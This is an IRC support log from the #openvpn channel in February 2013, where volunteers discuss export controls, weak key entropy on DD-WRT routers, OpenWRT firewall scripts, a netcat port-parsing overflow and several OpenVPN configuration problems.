[~master_of@p57B53E8C.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 07:05 -!- master_of_master [~master_of@p57B53193.dip.t-dialin.net] has joined #openvpn 07:13 <@plaisthos> !inline 07:13 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 07:21 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 07:38 < baobeiiii> tried with verb 6 and no clients 07:38 < baobeiiii> same messages, no extra info 07:38 < baobeiiii> just going to ignore it 07:38 < baobeiiii> maybe turn off having a log file as it'll get big over time 07:40 < pekster> You can use syslog too instead of a file and just drop those lines 08:00 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::] has joined #openvpn 08:19 -!- vraa__ [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 08:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:55 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 09:11 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 09:12 <@ecrist> !verify 09:12 <@ecrist> !factoids search verify 09:12 <@vpnHelper> "certverify" is (#1) verify your certs are signed correctly by running `openssl verify -CAfile ` for client.crt and server.crt or (#2) also make sure you use the same ca.crt on both sides by checking their md5 09:12 <@ecrist> !factoids 09:12 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 09:56 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Remote host closed the connection] 09:59 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn 10:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:28 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Read error: Operation timed out] 10:29 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Read error: Operation timed out] 10:29 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 10:29 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 10:34 -!- axelm7 [~axelm7@186.135.15.41] has joined #openvpn 10:36 < axelm7> hi guys, I am using openvpn on DD-WRT in six countried in the Caribbean. The VPN server is in the US. My customer (the user) is a Forbes 100 company from the US. 10:36 < axelm7> So now they have me filling out security compliance forms for a possible audit and one of the questions is regarding software export controls. 10:42 <@ecrist> so what do you want to know? 10:42 < pekster> Few (if any) people here care about credentials, company size, your companies budget, or your job title. Further, you're unlikely to get legal advice from someone in a volunteer-run open-source IRC channel. That said, OpenVPN is released under the GNU GPL version 2 with all the benefits under US crypto export law that entails. 10:42 * pekster needs to learn to type more one-liners like that ;) 10:42 < EugeneKay> axelm7 - openvpn uses the openssl library for all its crypto. You can use the stuff that applies to that. 10:43 < EugeneKay> And no, we don't care about your company at all, unless you're willing to pay us to fix your issues 10:45 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 248 seconds] 10:45 <@plaisthos> EugeneKay: why so harsh? 10:46 < axelm7> plaisthos, I foun pekster to be harsh, not EugeneKay. 10:46 < EugeneKay> You're confusing apathy with anger 10:47 <@plaisthos> EugeneKay: point taken, sounded different in my head 10:47 < axelm7> I just wanted to know if someone could give me some pointers regarding the usual procedure when openvpn export controls are involved 10:48 < pekster> axelm7: To my knowledge no one here is a lawyer. That said, export controls don't apply to open-source software where the code is freely available (again, from my read on US crypto law.) 10:48 < axelm7> this probably happens a lot when openvpn is used commercially 10:48 <@plaisthos> axelm7: not really 10:49 <@plaisthos> axelm7: most either use distribution which already have done this stuff and customers just rely on the distribution to have done the right stuff 10:49 <@plaisthos> or people buy OpenVPN As in which case you can ask the OpenVPN Corp 10:50 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 10:50 <@plaisthos> I think there are very few people actually doing roll your openvpn *and* do US export stuff 10:51 < EugeneKay> If you have enough money to fill out those forms you'll probably just buy AS 10:53 < axelm7> I have AS and since it is installed in the US I do not need an export license 10:53 -!- MeanderingCode [~Meanderin@71-213-170-8.albq.qwest.net] has joined #openvpn 10:53 < axelm7> My issue is with openvpn client on dd-wrt 10:55 <@dazo> axelm7: if you want security review compliance ... you should rather look at openvpn-nl .... which the dutch government uses 10:55 <@dazo> but it uses polarssl instead of openssl ... as openssl is basically impossible to review properly 10:56 <@dazo> axelm7: https://openvpn.fox-it.com/ 10:56 <@vpnHelper> Title: OpenVPN-NL (at openvpn.fox-it.com) 10:58 <@dazo> axelm7: and while I'm on a roll .... dd-wrt!?!? seriously!?!? the "littleblackbox" project have basically all ssh and https keys in a database, ready to decrypt the traffic to/from dd-wrt boxes .... and dd-wrt people don't see that as an issue 10:58 <@dazo> dd-wrt is fine inside a locked-down network ... but not when security is needed 11:00 < pekster> One can generate keys off embedded hardware, and in fact that is the recommendation due to the virtually complete lack of entropy on those things 11:00 < pekster> s/off/off of/ 11:00 <@dazo> pekster: true ... but having a public private key (see the irony there ;-)) ... that doesn't help either 11:01 <@plaisthos> axelm7: if you use dd-wrt you probably also need US export for all other compononents like ssh, linux kernel, .... 11:01 <@dazo> and btw ... dd-wrt don't care about mentioning security issues to their users either .... here's a case where an IP tables rules was found, opening up the device from specific IP addresses ... http://www.dd-wrt.com/phpBB2/viewtopic.php?t=35783 11:02 < pekster> dazo: cute. OpenWRT has ugly rules (for UCI/LuCI integration, and they look awful) but at least they contain no unpleasant surprises... 11:03 <@dazo> pekster: exactly! I usually remove the UCI firewall crap and install iptables-utils ... then you have some decent tools :) 11:03 < pekster> "it seems that chris implemented this for a customer" <-- huh?!? 11:03 <@dazo> customer == government!?!? 11:04 < pekster> Yea, I have my own custom firmeware build. I also hate OpenWRT's UCI-friendly openvpn setup, so I replaced it with a cleaner initscript I wrote from scratch that uses traditional config files like a good implementation 11:04 < axelm7> well, this is for a retail network that does not traffic sensible information 11:04 < pekster> Actually, I need to clean that up and post it online so other people can use my scripts too 11:05 < EugeneKay> I need breakfast. 11:05 <@dazo> pekster: that'd be great :) 11:05 * dazo need to find time to clean-up his own openwrt setup :) 11:05 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:06 < pekster> It also supports an unlimited number of configurations (well, until you OOM the poor router) by way of symlinks. I may choose to clean that up to use a UCI config file for the instance -> config file mappings instead 11:08 < pekster> dazo: FYI, here's my (currently quite limited) GPL OpenWRT offerings: http://pekster.sdf.org/code/projects/openwrt.html . Maybe by the end of this month I can get the openvpn mess cleaned up enough for a public release too 11:08 <@vpnHelper> Title: OpenWRT Misc Code and Scripts (at pekster.sdf.org) 11:08 -!- b1rkh0ff [~b1rkh0ff@178.77.7.9] has quit [Read error: Connection reset by peer] 11:08 * dazo looks 11:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:10 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 264 seconds] 11:12 < axelm7> dazo, regarding the littlebackbox project and ddwrt, the openvpn keys are created on openvpnas, not locally on the router. 11:13 <@dazo> axelm7: openvpn keys, yes .... but not ssh keys, which are used to ssh into the dd-wrt router 11:13 < axelm7> the sshd key might be an issue though if entropy is as bad as you mention 11:13 < pekster> It's hidious 11:13 * pekster digs up the paper on the topic 11:13 <@dazo> axelm7: if you re-create ssh keys on the dd-wrt box, that's also a joke .... you need to create new keys on a proper box with proper entropy ... and those keys needs to be installed 11:14 <@dazo> axelm7: but to make those keys reboot-safe, you basically need to recreate the flash image, iirc 11:14 < axelm7> they can be stored in nvram by command line. 11:14 <@dazo> well, that helps 11:14 < pekster> Here's the paper: http://eprint.iacr.org/2006/086.pdf 11:15 < axelm7> this is from 7 years ago. do you know if this was addressed in newer Linux kernels? 11:16 < pekster> Not on embedded hardware 11:16 < pekster> 29C3 had a talk called "Facthacks" you should watch that brought this up (that was end of 2012) 11:16 <@dazo> pekster: your wrt-iptables stuff looks pretty close to what I have hacked together, but yours is more polished - with the uci integration 11:16 < pekster> It's a limitation on the fact that embedded hardware has no disk, no keyboard/mouse, and no network sources in early-boot 11:16 <@dazo> nice work! 11:17 < pekster> dazo: Yea, I don't like abstracting away everything like the stock LuCI-friendly stuff does, but UCI has a lot of benefits too when used properly 11:17 <@dazo> agreed! ... but writing firewall rules in uci is just .... horrible 11:17 < pekster> My stuff should even run on a stock firmware, although IIRC they still need the iptables-{save,restore} symlinked against iptables (but the support is there) 11:18 * dazo thought you needed the iptables-utils package ... which gives you iptables-multi 11:18 <@dazo> (I might remember wrong, or not having paid attention enough to iptables changes) 11:19 < pekster> Nope, my build does not have CONFIG_PACKAGE_iptables-utils installed 11:20 -!- raidz is now known as raidz_away 11:20 -!- b1rkh0ff [~b1rkh0ff@178.77.7.9] has joined #openvpn 11:20 <@dazo> interesting :) 11:21 <@plaisthos> maybe busybox has now an iptables implementation 11:21 <@dazo> hmm ... plausible, but doubt it 11:22 < pekster> In backfire (10.03.1 that I'm running/building off of) /sbin/iptables is not a symlink; it's an actual executable 11:22 < pekster> I just didn't get the traditional save/restore symlinks and had to add them myself post-boot 11:22 <@dazo> yeah ... and I see this: 11:22 <@dazo> # ll /usr/sbin/iptables* 11:22 <@dazo> -rwxr-xr-x 1 root root 54400 Nov 9 2010 /usr/sbin/iptables 11:22 <@dazo> -rwxr-xr-x 1 root root 54400 Nov 9 2010 /usr/sbin/iptables-restore 11:22 <@dazo> -rwxr-xr-x 1 root root 54400 Nov 9 2010 /usr/sbin/iptables-save 11:22 <@dazo> and the md5sum is identical 11:22 < pekster> Ugh 11:23 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 11:23 < pekster> Maybe iptables-utils "helpfully" did that? 11:23 <@dazo> yeah, probably ... stupid iptables-utils package 11:23 <@dazo> well, it's a rather old and hacky image I'm looking at right now 11:23 < pekster> If it's in jffs2 you might gain the space back by removing and symlinking them (won't help if you build that into your own custom firmware as it'd be squashfs'd) 11:24 -!- AsadH is now known as zz_AsadH 11:24 < |Mike|> n 11:24 <@dazo> pekster: I actually think this is from the image, not post-installed 11:24 <@dazo> (maybe squashfs doesn't support symlinks?) 11:24 < pekster> I put everything in squashfs; learning to use the buildsystem means things like openvpn, tcpdump, and bunches of other goodies are all compressed for space-savings 11:24 <@plaisthos> dazo: 54k is too small for busy box :) 11:25 <@dazo> hahaha 11:26 <@plaisthos> (at least for a big busybox version with all bells and whistles which would include iptables) 11:26 <@dazo> yeah ... busybox is basically an OS without the kernel ;-) 11:27 * dazo waits for the day busybox swallows systemd :-P 11:27 < pekster> a la RMS 11:27 <@dazo> :) 11:27 < axelm7> thanks guys, seems I have some key generation and distribution to do. Thanks for the feedback about the PRNG and the export rules. 11:28 < pekster> axelm7: The tl;dr on that Facthacks talk (they're a funny group to watch if you're into RSA stuff and can spare an hour) is that embedded is bad PRNG, and you should use >=2048 for asymettric RSA crypto 11:28 <@dazo> axelm7: also, double check your iptables too ;-) 11:29 < pekster> Here's one of their slides: http://pekster.sdf.org/misc/bluffdale_power.png 11:29 < axelm7> and regarding your question about why a big company would use dd'wrt routers? because their procurement department is useless so we have to buy whatever is available off the shelf in the Caribbean. 11:29 <@plaisthos> procurement 11:29 <@plaisthos> argh 11:31 < axelm7> if you want it in ten days, forget about the procurement department. 11:31 -!- Netsplit *.net <-> *.split quits: Sickness\, Jonathan__, Masxmasx, pppingme, mnathani, jtrucks, hive-mind 11:32 -!- Kireji [~nospam@biocontact.org] has left #openvpn [] 11:32 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 11:34 <@dazo> pekster: btw ... do you know if there's a new openwrt release in the pipe? last stable release was dec 2011 11:34 <@dazo> that's kinda long ago .... 11:34 < pekster> AA is in _rc now 11:34 < pekster> 12.x 11:34 <@dazo> ohhh ... nice 11:34 <@dazo> probably not updated the web front then 11:35 -!- raidz_away is now known as raidz 11:35 < pekster> http://downloads.openwrt.org/attitude_adjustment/ 11:35 <@vpnHelper> Title: Index of /attitude_adjustment/ (at downloads.openwrt.org) 11:35 < pekster> Higher hardware requirements; if you don't have 16M RAM minimum, AA probably won't work 11:35 <@dazo> thx! 11:36 <@dazo> oh, I think wr1043nd got 32 11:36 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 11:36 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 11:36 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 11:36 -!- Masxmasx [~IetsVulga@unaffiliated/masxmasx] has joined #openvpn 11:36 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 11:36 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 11:37 <@plaisthos> are there up to date devices which run openwrt? 11:37 < pekster> Yea, from what I've heard in their channel some of the WDR units are nice with more RAM and wireless N, GigE, etc 11:37 <@plaisthos> Last I check it was difficult to find a 802.11n/Gigabit device which really ran OpenWrt (without "it runs but ....") 11:38 < pekster> Indeed, you still need to shop carefully to get a unit that works with no open wifi chip, etc 11:38 < pekster> s/no/an/ 11:39 < pekster> #openwrt can help better; I've just heard things; I probably won't bother shoping for an AA-supporting unit until I get native IPv6 and need to update. Maybe I'll even run openvpn on it then too (and help them get a build working for 2.3 if they don't have it by then) 11:39 <@plaisthos> I basically just wanted something to bridge from 5ghz to lan and ended up buying a dedicated lan <-> wifi bridge 11:40 < pekster> Yea, you can buy a cheap $20 thing that way, and then put money into a decent *wrt unit that can run your toys and worry less about wifi. eggs and baskets I figure 11:42 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Read error: Connection reset by peer] 11:42 < pekster> My "dev" OpenWRT unit is an Asus WL-500gPv2, an older-model with 8M flash/32M RAM. It runs openvpn nicely, and might possibly run AA. However, wifi is busted unless you run a 2.4 kernel with broadcom's binary kernel blob; I run 2.6 and forgo wifi to get semi-modern support. TBH it's really for openvpn development tasks anyway 11:42 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 11:42 < pekster> No wifi, and no gigE on that (not that openvpn could handle even 100Mbps with the processor limitations) 11:43 <@dazo> The wr1043nd is 1Gbit bridge with atheros wifi .11/abgn) 11:45 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 11:47 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 11:47 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 260 seconds] 11:48 <@plaisthos> pekster: if you want 802.11a/n nothing is cheap anymore ;) 11:48 < pekster> This is why I like separate functions: a cheap(-ish) wifi AP/bridge, and whatever I need for wired/RAM/flash/proc for the border-CPE 11:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:49 < pekster> And I can swap them each out independently as needs change or deals come up 11:49 * pekster misses the days of $20 sales on "good" open-source friendly equipment 11:50 < JackSparrow> hi, i just made netcat work with port 421337. How could that be possible ? 11:51 <@plaisthos> .oO(uint_16 foo = atoi(421337) ) 11:52 <@dazo> JackSparrow: integer overflow 11:56 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 11:57 < pekster> Seems accurate. I get this result with the netcat6 tool (netcat6.sf.net) http://fpaste.org/o1WZ/ 11:57 * plaisthos has a different netcat on OS X 11:58 <@plaisthos> nc -4 -l 421337 11:58 <@plaisthos> nc: getaddrinfo: nodename nor servname provided, or not known 11:58 < pekster> One with this bug ;) 11:58 < pekster> without* 11:58 <@plaisthos> yeah 11:58 <@plaisthos> nc -4 -l openvpn also works :) 11:59 < pekster> Yea, I can use service names too 11:59 <@plaisthos> weired implementation 11:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 11:59 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 11:59 -!- Denial- is now known as Denial 11:59 <@plaisthos> you should all pass the port string to getaddrinfo 11:59 <@plaisthos> and don't roll your own does this look like a port or integer value implementation 11:59 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 11:59 < pekster> There's also "gnu-netcat" in my repos - not sure what that is 12:00 <@plaisthos> mine is no gnu netcat 12:00 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 12:00 < pekster> Ironically, here's the repo desscription for netcat6: "netcat clone with better IPv6 support, improved code, etc..." 12:00 <@plaisthos> it does not like --help or --version 12:00 * pekster chuckles at "improved code" 12:00 < pekster> Ah, then there's a 4th option, "openbsd-netcat" 12:01 <@plaisthos> probably the one I have 12:01 <@plaisthos> OpenBSD => FreeBSD => Mac OS X :) 12:01 < pekster> OpenWRT symlinks that to busybox ;) 12:01 <@plaisthos> or FreeBSD has its own nc 12:02 < pekster> http://fpaste.org/mTTG/ 12:02 < pekster> No udp support I guess 12:03 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 12:06 <@plaisthos> no support for almost anything but basic netcat usage :) 12:06 < EugeneKay> But GNU is better! 12:06 < pekster> Well, yea. It accepts 'nc -l -p openvpn' and then chooses some high ephemeral port 12:07 <@plaisthos> EugeneKay: for some people :) 12:07 < EugeneKay> For feeling morally superior 12:07 <@plaisthos> pekster: well drop the -p 12:07 <@plaisthos> -p is source port 12:07 <@plaisthos> on BSD nc using -l with -p is an error 12:07 < pekster> Not according the output that syas "-p PORT Local port" 12:08 <@plaisthos> pekster: :) 12:08 <@ecrist> !inline 12:08 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 12:08 <@plaisthos> pekster: usage could be wrong too 12:08 <@plaisthos> just try it :) 12:08 < pekster> nc: bad address 'openvpn' 12:08 < pekster> ;) 12:09 <@plaisthos> pekster: argh 12:09 < pekster> I think this is the first time I've ever called that command 12:09 <@plaisthos> pekster: I don't think busybox nc has getaddrinfo support :D 12:09 < pekster> (on that host) 12:22 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 12:25 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:35 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds] 12:54 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 12:55 -!- discojoe [~wtf@193.28.228.85] has joined #openvpn 12:56 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 13:00 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 13:00 -!- Denial- is now known as Denial 13:00 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 240 seconds] 13:00 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 240 seconds] 13:02 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 13:04 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 13:07 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has joined #openvpn 13:09 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has joined #openvpn 13:09 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 276 seconds] 13:09 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Read error: Connection reset by peer] 13:10 < plut0> something keeps overwriting the gateway on the client side (windows). if i connect, run a tracert it shows the correct gateway, if i run tracert again, it's using the default gateway which is wrong. why is this happening? 13:10 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 13:18 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 248 seconds] 13:19 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 255 seconds] 13:22 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds] 13:25 < JackSparrow> plaisthos: dazo: thanks :) 13:49 < matsh> pekster: Around? 13:50 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Ping timeout: 276 seconds] 13:54 -!- dazo is now known as dazo_afk 13:55 -!- BtbN [~btbn@btbn.de] has quit [Quit: Bye] 13:56 -!- BtbN [~btbn@btbn.de] has joined #openvpn 13:56 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 13:57 -!- dekroning [~dekroning@86.86.174.139] has joined #openvpn 13:57 < dekroning> hi 13:57 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 13:57 < dekroning> i'm using "OpenVPN Connect" on mac osx, and i'm not able to figure out how to add 2 vpn connections, so I started wondering is this even possible? 13:58 < EugeneKay> !osx 13:58 <@vpnHelper> "osx" is (#1) Tunnelblick includes everything you need to run OpenVPN on OS X. https://code.google.com/p/tunnelblick/ or (#2) Viscosity is another OpenVPN client for OS X, but it is commercial. http://www.thesparklabs.com/viscosity/ 13:58 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 245 seconds] 13:58 -!- Denial- is now known as Denial 13:58 < EugeneKay> dekroning - I'm 90% sure that "OpenVPN Connect" is the commercial product 14:00 < EugeneKay> I don't use the two clients listed either(not a Mac user), but I would think that you could launch two instances with them. 14:09 < matsh> !android 14:09 <@vpnHelper> "android" is (#1) an open source OpenVPN client for ICS is available in Google Play, look for OpenVPN for Android. FAQ is here: http://code.google.com/p/ics-openvpn/wiki/FAQ or (#2) If running cyanogenmod, openvpn and busybox are already installed for you! or (#3) If you do not have cyanogenmod or ICS, but your device is rooted, you can use android-openvpn-installer and openvpn-settings from the 14:09 <@vpnHelper> market 14:13 <@ecrist> ping krzee 14:37 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has left #openvpn [] 14:41 -!- Kovica [~Kovica@77.38.49.83] has joined #openvpn 14:56 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 14:59 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 14:59 -!- Denial- is now known as Denial 15:18 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:20 -!- novaflash is now known as novaflash_away 15:24 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer] 15:25 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:32 -!- novaflash_away is now known as novaflash 15:34 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 15:37 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has joined #openvpn 15:40 < magic_1> hi guys, anyone here to help, having an issue , TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity) 15:40 < magic_1> Mon Feb 18 23:39:13 2013 TLS Error: TLS handshake failed 15:40 < magic_1> Mon Feb 18 23:39:13 2013 SIGUSR1[soft,tls-error] received, process restarting 15:40 < magic_1> Mon Feb 18 23:39:13 2013 MANAGEMENT: >STATE:1361223553,RECONNECTING,tls-error, 15:40 < magic_1> apologies for the long paste 15:56 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 15:57 < JackSparrow> hi again, the server gives the same IP to my two clients 15:57 < JackSparrow> server config: http://haipeng.xomg.net/server.conf 16:00 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 256 seconds] 16:00 -!- Denial- is now known as Denial 16:07 -!- baobeiiii [~baobeiiii@180.155.14.35] has quit [Quit: Leaving] 16:12 -!- Kovica [~Kovica@77.38.49.83] has quit [Remote host closed the connection] 16:14 -!- torbjorn [~torbjorn@2001:840:4051::56] has joined #openvpn 16:22 < JackSparrow> is it possible to set the server to requier a certificate OR username/password ? 16:23 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 16:30 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:43 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Ping timeout: 245 seconds] 16:43 -!- ecrist [~ecrist@freebsd/contributor/openvpn.community.support.ecrist] has quit [Ping timeout: 264 seconds] --- Log closed Mon Feb 18 16:43:51 2013 --- Log opened Mon Feb 18 16:43:59 2013 16:43 -!- ecrist [~ecrist@token-black.secure-computing.net] has joined #openvpn 16:43 -!- Irssi: #openvpn: Total of 177 nicks [5 ops, 0 halfops, 1 voices, 171 normal] 16:43 -!- mode/#openvpn [+o ecrist] by ChanServ 16:44 < mikie_west> No. Internet? 16:44 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 16:44 -!- mode/#openvpn [+o vpnHelper] by ChanServ 16:44 -!- Irssi: Join to #openvpn was synced in 37 secs 16:56 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 16:58 -!- p3rror [~mezgani@2001:0:53aa:64c:14a1:6da7:d607:3134] has joined #openvpn 16:59 -!- axelm7 [~axelm7@186.135.15.41] has left #openvpn [] 17:00 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 244 seconds] 17:00 -!- Denial- is now known as Denial 17:01 -!- mikey_w [~mike@c-71-63-115-202.hsd1.va.comcast.net] has joined #openvpn 17:02 -!- mikie_west [~androirc@c-71-63-115-202.hsd1.va.comcast.net] has quit [Quit: AndroIRC - Android IRC Client ( http://www.androirc.com )] 17:14 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 17:15 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 17:36 -!- p3rror [~mezgani@2001:0:53aa:64c:14a1:6da7:d607:3134] has quit [Ping timeout: 245 seconds] 17:56 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 17:59 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 252 seconds] 17:59 -!- Denial- is now known as Denial 18:20 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 256 seconds] 18:21 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 255 seconds] 18:23 -!- p3rror [~mezgani@2001:0:53aa:64c:2084:503f:d607:3134] has joined #openvpn 18:30 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 18:54 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 19:03 -!- raidz is now known as raidz_away 19:03 -!- mnice [~jdoe@static-84-242-118-58.net.upcbroadband.cz] has joined #openvpn 19:03 < mnice> hello 19:04 < mnice> i'm unable to find any usable openvpn-as for SLES|suse .. http://openvpn.net/index.php/download/access-server-downloads.html 19:04 <@vpnHelper> Title: Access Server Downloads (at openvpn.net) 19:05 < mnice> can I get somewhere some generic installer ? 19:05 < rob0> !as 19:05 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 19:07 < mnice> fair 19:16 -!- LifeIsPain [~lip@unaffiliated/lifeispain] has quit [Ping timeout: 248 seconds] 19:26 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-safvatvxnhzshede] has joined #openvpn 19:45 -!- p3rror [~mezgani@2001:0:53aa:64c:2084:503f:d607:3134] has quit [Ping timeout: 245 seconds] 20:27 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 20:44 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] 20:52 < mikey_w> Hello. Help my tun device has zero received packets? 20:52 < mikey_w> I can connect to the server but can't see the internet? 20:53 < mikey_w> The server starts without any errors. 20:53 < pekster> What are you trying to do? The end goal? 20:53 < mikey_w> To use my home server as a vpn while at hotspots. 20:54 < mikey_w> Pptpd vpn works. 20:54 < mikey_w> But not all my devices support it. 20:55 < pekster> pptp is an awful protocol that is vastly insecure. It's been known weak for over a decade, and essentially cracked as of last year 20:56 < mikey_w> I know hence the openvpn attempt. 20:56 < pekster> So, you just want to connect into the VPN? It sounds like you're talking about traffic redirection, but that's not a requirement of a "VPN" per-se 20:56 < mikey_w> I am using the sample server conf file. 20:57 < mikey_w> How do I redirect it to the internet? 20:57 < pekster> !redirect 20:57 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) 